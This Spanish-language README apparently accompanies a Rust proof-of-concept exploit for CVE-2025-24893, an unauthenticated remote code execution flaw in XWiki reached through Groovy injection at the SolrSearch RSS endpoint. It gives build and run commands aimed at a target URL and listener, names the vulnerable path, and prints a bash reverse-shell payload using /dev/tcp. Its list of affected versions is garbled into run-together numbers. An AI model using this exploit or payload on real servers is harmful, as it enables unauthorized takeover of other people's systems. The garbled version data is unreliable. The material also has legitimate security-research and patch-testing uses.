
Exploit de Prueba de Concepto para CVE-2025-24893, una vulnerabilidad de Ejecución Remota de Código (RCE) no autenticada en XWiki. Explota una falla de inyección de plantillas en el endpoint SolrSearch mediante la ejecución de scripts Groovy.
Exploit de Prueba de Concepto para CVE-2025-24893, una vulnerabilidad crítica de Ejecución Remota de Código no autenticada en XWiki.
Este exploit abusa de una inyección de plantilla Groovy en el endpoint SolrSearch para ejecutar comandos arbitrarios — incluyendo shells inversas — sin autenticación.
Una falla en cómo XWiki maneja la entrada manipulada al endpoint RSS SolrSearch permite a los atacantes inyectar código Groovy en el pipeline de renderizado.
Esto habilita RCE no autenticado mediante bloques de script {{groovy}}.
< 15.10.11>= 16.0.0 y < 16.4.115.10.1116.4.1Descarga el lanzamiento:
o compila desde el código fuente:
cargo build --release
./target/release/cve-2025-24893-gato --url http://target --ip 10.10.10.10 --port 4444
Hay un payload preconstruido de shell inversa en esta forma:
bash -c 'sh -i >& /dev/tcp/{IP}/{PORT} 0>&1
Este código es solo para fines educativos e investigación de seguridad autorizada.
No uses este exploit contra sistemas que no poseas o para los que no tengas permiso explícito de prueba.
/bin/get/Main/SolrSearch?media=rss